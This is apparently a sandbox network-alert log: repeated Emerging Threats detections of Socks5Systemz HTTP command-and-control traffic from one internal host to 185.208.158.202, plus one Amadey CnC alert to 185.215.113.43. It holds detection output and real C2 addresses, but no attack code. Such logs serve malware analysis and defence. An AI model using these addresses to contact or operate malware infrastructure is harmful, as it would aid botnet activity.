2024-11-15T14:14:29.955404+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50422	185.208.158.202	80	TCP
2024-11-15T14:14:29.955404+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50422	185.208.158.202	80	TCP
2024-11-15T14:14:30.993400+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50423	185.208.158.202	80	TCP
2024-11-15T14:14:30.993400+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50423	185.208.158.202	80	TCP
2024-11-15T14:14:32.031991+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50425	185.208.158.202	80	TCP
2024-11-15T14:14:32.031991+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50425	185.208.158.202	80	TCP
2024-11-15T14:14:33.290461+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50426	185.208.158.202	80	TCP
2024-11-15T14:14:33.290461+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50426	185.208.158.202	80	TCP
2024-11-15T14:14:34.351729+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50427	185.208.158.202	80	TCP
2024-11-15T14:14:34.351729+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50427	185.208.158.202	80	TCP
2024-11-15T14:14:35.393083+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50429	185.208.158.202	80	TCP
2024-11-15T14:14:35.393083+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50429	185.208.158.202	80	TCP
2024-11-15T14:14:36.431347+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50430	185.208.158.202	80	TCP
2024-11-15T14:14:36.431347+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50430	185.208.158.202	80	TCP
2024-11-15T14:14:37.522179+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50432	185.208.158.202	80	TCP
2024-11-15T14:14:37.522179+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50432	185.208.158.202	80	TCP
2024-11-15T14:14:38.937917+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50433	185.208.158.202	80	TCP
2024-11-15T14:14:38.937917+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50433	185.208.158.202	80	TCP
2024-11-15T14:14:39.989855+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50437	185.208.158.202	80	TCP
2024-11-15T14:14:39.989855+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50437	185.208.158.202	80	TCP
2024-11-15T14:14:41.054843+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50438	185.208.158.202	80	TCP
2024-11-15T14:14:41.054843+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50438	185.208.158.202	80	TCP
2024-11-15T14:14:42.100907+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50441	185.208.158.202	80	TCP
2024-11-15T14:14:42.100907+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50441	185.208.158.202	80	TCP
2024-11-15T14:14:43.500951+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50442	185.208.158.202	80	TCP
2024-11-15T14:14:43.500951+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50442	185.208.158.202	80	TCP
2024-11-15T14:14:44.609679+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50444	185.208.158.202	80	TCP
2024-11-15T14:14:44.609679+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50444	185.208.158.202	80	TCP
2024-11-15T14:14:45.672065+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50445	185.208.158.202	80	TCP
2024-11-15T14:14:45.672065+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50445	185.208.158.202	80	TCP
2024-11-15T14:14:46.775848+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50446	185.208.158.202	80	TCP
2024-11-15T14:14:46.775848+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50446	185.208.158.202	80	TCP
2024-11-15T14:14:47.837525+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50448	185.208.158.202	80	TCP
2024-11-15T14:14:47.837525+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50448	185.208.158.202	80	TCP
2024-11-15T14:14:50.247076+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50449	185.208.158.202	80	TCP
2024-11-15T14:14:50.247076+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50449	185.208.158.202	80	TCP
2024-11-15T14:14:51.284595+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50451	185.208.158.202	80	TCP
2024-11-15T14:14:51.284595+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50451	185.208.158.202	80	TCP
2024-11-15T14:14:52.339090+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50454	185.208.158.202	80	TCP
2024-11-15T14:14:52.339090+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50454	185.208.158.202	80	TCP
2024-11-15T14:14:53.379193+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50455	185.208.158.202	80	TCP
2024-11-15T14:14:53.379193+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50455	185.208.158.202	80	TCP
2024-11-15T14:14:54.418422+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50456	185.208.158.202	80	TCP
2024-11-15T14:14:54.418422+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50456	185.208.158.202	80	TCP
2024-11-15T14:14:55.652660+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50458	185.208.158.202	80	TCP
2024-11-15T14:14:55.652660+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50458	185.208.158.202	80	TCP
2024-11-15T14:14:56.679675+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50459	185.208.158.202	80	TCP
2024-11-15T14:14:56.679675+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50459	185.208.158.202	80	TCP
2024-11-15T14:14:57.708531+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50461	185.208.158.202	80	TCP
2024-11-15T14:14:57.708531+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50461	185.208.158.202	80	TCP
2024-11-15T14:14:58.747617+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50462	185.208.158.202	80	TCP
2024-11-15T14:14:58.747617+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50462	185.208.158.202	80	TCP
2024-11-15T14:14:59.779522+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50463	185.208.158.202	80	TCP
2024-11-15T14:14:59.779522+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50463	185.208.158.202	80	TCP
2024-11-15T14:15:00.814226+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50465	185.208.158.202	80	TCP
2024-11-15T14:15:00.814226+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50465	185.208.158.202	80	TCP
2024-11-15T14:15:01.848087+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50467	185.208.158.202	80	TCP
2024-11-15T14:15:01.848087+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50467	185.208.158.202	80	TCP
2024-11-15T14:15:02.883163+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50469	185.208.158.202	80	TCP
2024-11-15T14:15:02.883163+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50469	185.208.158.202	80	TCP
2024-11-15T14:15:03.927779+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50470	185.208.158.202	80	TCP
2024-11-15T14:15:03.927779+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50470	185.208.158.202	80	TCP
2024-11-15T14:15:04.964066+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50473	185.208.158.202	80	TCP
2024-11-15T14:15:04.964066+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50473	185.208.158.202	80	TCP
2024-11-15T14:15:06.034462+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50474	185.208.158.202	80	TCP
2024-11-15T14:15:06.034462+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50474	185.208.158.202	80	TCP
2024-11-15T14:15:07.490581+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50475	185.208.158.202	80	TCP
2024-11-15T14:15:07.490581+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50475	185.208.158.202	80	TCP
2024-11-15T14:15:08.536462+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50477	185.208.158.202	80	TCP
2024-11-15T14:15:08.536462+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50477	185.208.158.202	80	TCP
2024-11-15T14:15:09.578171+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50478	185.208.158.202	80	TCP
2024-11-15T14:15:09.578171+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50478	185.208.158.202	80	TCP
2024-11-15T14:15:10.056144+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	50479	185.215.113.43	80	TCP
2024-11-15T14:15:10.602047+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50480	185.208.158.202	80	TCP
2024-11-15T14:15:10.602047+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50480	185.208.158.202	80	TCP
2024-11-15T14:15:11.667508+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50482	185.208.158.202	80	TCP
2024-11-15T14:15:11.667508+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50482	185.208.158.202	80	TCP
2024-11-15T14:15:12.714483+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50484	185.208.158.202	80	TCP
2024-11-15T14:15:12.714483+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50484	185.208.158.202	80	TCP
2024-11-15T14:15:13.757442+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50485	185.208.158.202	80	TCP
2024-11-15T14:15:13.757442+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50485	185.208.158.202	80	TCP
2024-11-15T14:15:14.795943+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50486	185.208.158.202	80	TCP
2024-11-15T14:15:14.795943+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50486	185.208.158.202	80	TCP
2024-11-15T14:15:15.820095+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50488	185.208.158.202	80	TCP
2024-11-15T14:15:15.820095+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50488	185.208.158.202	80	TCP
2024-11-15T14:15:16.863716+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50489	185.208.158.202	80	TCP
2024-11-15T14:15:16.863716+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50489	185.208.158.202	80	TCP
2024-11-15T14:15:17.894974+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50491	185.208.158.202	80	TCP
2024-11-15T14:15:17.894974+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50491	185.208.158.202	80	TCP
2024-11-15T14:15:18.927912+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50492	185.208.158.202	80	TCP
2024-11-15T14:15:18.927912+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50492	185.208.158.202	80	TCP
2024-11-15T14:15:20.709747+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50493	185.208.158.202	80	TCP
2024-11-15T14:15:20.709747+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50493	185.208.158.202	80	TCP
2024-11-15T14:15:21.739303+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50496	185.208.158.202	80	TCP
2024-11-15T14:15:21.739303+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50496	185.208.158.202	80	TCP
2024-11-15T14:15:22.784426+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50497	185.208.158.202	80	TCP
2024-11-15T14:15:22.784426+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50497	185.208.158.202	80	TCP
2024-11-15T14:15:23.826425+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50499	185.208.158.202	80	TCP
2024-11-15T14:15:23.826425+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50499	185.208.158.202	80	TCP
2024-11-15T14:15:24.890845+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50500	185.208.158.202	80	TCP
2024-11-15T14:15:24.890845+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50500	185.208.158.202	80	TCP
2024-11-15T14:15:25.948117+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50502	185.208.158.202	80	TCP
2024-11-15T14:15:25.948117+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50502	185.208.158.202	80	TCP
2024-11-15T14:15:26.991045+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50503	185.208.158.202	80	TCP
2024-11-15T14:15:26.991045+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50503	185.208.158.202	80	TCP
2024-11-15T14:15:28.025218+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50504	185.208.158.202	80	TCP
2024-11-15T14:15:28.025218+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50504	185.208.158.202	80	TCP
2024-11-15T14:15:29.094358+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50506	185.208.158.202	80	TCP
2024-11-15T14:15:29.094358+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50506	185.208.158.202	80	TCP
2024-11-15T14:15:30.132166+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50507	185.208.158.202	80	TCP
2024-11-15T14:15:30.132166+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50507	185.208.158.202	80	TCP
2024-11-15T14:15:31.180105+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50509	185.208.158.202	80	TCP
2024-11-15T14:15:31.180105+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50509	185.208.158.202	80	TCP
2024-11-15T14:15:32.200911+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50511	185.208.158.202	80	TCP
2024-11-15T14:15:32.200911+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50511	185.208.158.202	80	TCP
2024-11-15T14:15:33.242277+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50513	185.208.158.202	80	TCP
2024-11-15T14:15:33.242277+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50513	185.208.158.202	80	TCP
2024-11-15T14:15:34.284296+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50514	185.208.158.202	80	TCP
2024-11-15T14:15:34.284296+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50514	185.208.158.202	80	TCP
2024-11-15T14:15:35.705136+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50515	185.208.158.202	80	TCP
2024-11-15T14:15:35.705136+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50515	185.208.158.202	80	TCP
2024-11-15T14:15:36.746368+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50517	185.208.158.202	80	TCP
2024-11-15T14:15:36.746368+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50517	185.208.158.202	80	TCP
2024-11-15T14:15:37.772307+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50518	185.208.158.202	80	TCP
2024-11-15T14:15:37.772307+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50518	185.208.158.202	80	TCP
2024-11-15T14:15:38.813289+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50519	185.208.158.202	80	TCP
2024-11-15T14:15:38.813289+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50519	185.208.158.202	80	TCP
2024-11-15T14:15:39.887439+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50521	185.208.158.202	80	TCP
2024-11-15T14:15:39.887439+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50521	185.208.158.202	80	TCP
2024-11-15T14:15:40.944784+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50522	185.208.158.202	80	TCP
2024-11-15T14:15:40.944784+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50522	185.208.158.202	80	TCP
2024-11-15T14:15:42.017256+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50524	185.208.158.202	80	TCP
2024-11-15T14:15:42.017256+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50524	185.208.158.202	80	TCP
2024-11-15T14:15:43.075620+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50525	185.208.158.202	80	TCP
2024-11-15T14:15:43.075620+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50525	185.208.158.202	80	TCP
2024-11-15T14:15:44.126219+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50527	185.208.158.202	80	TCP
2024-11-15T14:15:44.126219+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50527	185.208.158.202	80	TCP
2024-11-15T14:15:45.155514+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50528	185.208.158.202	80	TCP
2024-11-15T14:15:45.155514+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50528	185.208.158.202	80	TCP
2024-11-15T14:15:46.217824+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50529	185.208.158.202	80	TCP
2024-11-15T14:15:46.217824+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50529	185.208.158.202	80	TCP
2024-11-15T14:15:47.260664+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50531	185.208.158.202	80	TCP
2024-11-15T14:15:47.260664+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50531	185.208.158.202	80	TCP
2024-11-15T14:15:48.296099+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50532	185.208.158.202	80	TCP
2024-11-15T14:15:48.296099+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50532	185.208.158.202	80	TCP
2024-11-15T14:15:49.318032+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50534	185.208.158.202	80	TCP
2024-11-15T14:15:49.318032+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50534	185.208.158.202	80	TCP
2024-11-15T14:15:50.362162+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50535	185.208.158.202	80	TCP
2024-11-15T14:15:50.362162+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50535	185.208.158.202	80	TCP
2024-11-15T14:15:51.398246+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50536	185.208.158.202	80	TCP
2024-11-15T14:15:51.398246+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50536	185.208.158.202	80	TCP
2024-11-15T14:15:52.436913+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50538	185.208.158.202	80	TCP
2024-11-15T14:15:52.436913+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50538	185.208.158.202	80	TCP
2024-11-15T14:15:53.497457+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50539	185.208.158.202	80	TCP
2024-11-15T14:15:53.497457+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50539	185.208.158.202	80	TCP
2024-11-15T14:15:54.528644+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50541	185.208.158.202	80	TCP
2024-11-15T14:15:54.528644+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50541	185.208.158.202	80	TCP
2024-11-15T14:15:55.579328+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50542	185.208.158.202	80	TCP
2024-11-15T14:15:55.579328+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50542	185.208.158.202	80	TCP
2024-11-15T14:15:56.657419+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50544	185.208.158.202	80	TCP
2024-11-15T14:15:56.657419+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50544	185.208.158.202	80	TCP
2024-11-15T14:15:57.709286+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50545	185.208.158.202	80	TCP
2024-11-15T14:15:57.709286+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50545	185.208.158.202	80	TCP
2024-11-15T14:15:58.759050+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50546	185.208.158.202	80	TCP
2024-11-15T14:15:58.759050+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50546	185.208.158.202	80	TCP
2024-11-15T14:15:59.794331+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50548	185.208.158.202	80	TCP
2024-11-15T14:15:59.794331+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50548	185.208.158.202	80	TCP
2024-11-15T14:16:00.857797+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50549	185.208.158.202	80	TCP
2024-11-15T14:16:00.857797+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50549	185.208.158.202	80	TCP
2024-11-15T14:16:01.905135+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50551	185.208.158.202	80	TCP
2024-11-15T14:16:01.905135+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50551	185.208.158.202	80	TCP
2024-11-15T14:16:02.939497+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50552	185.208.158.202	80	TCP
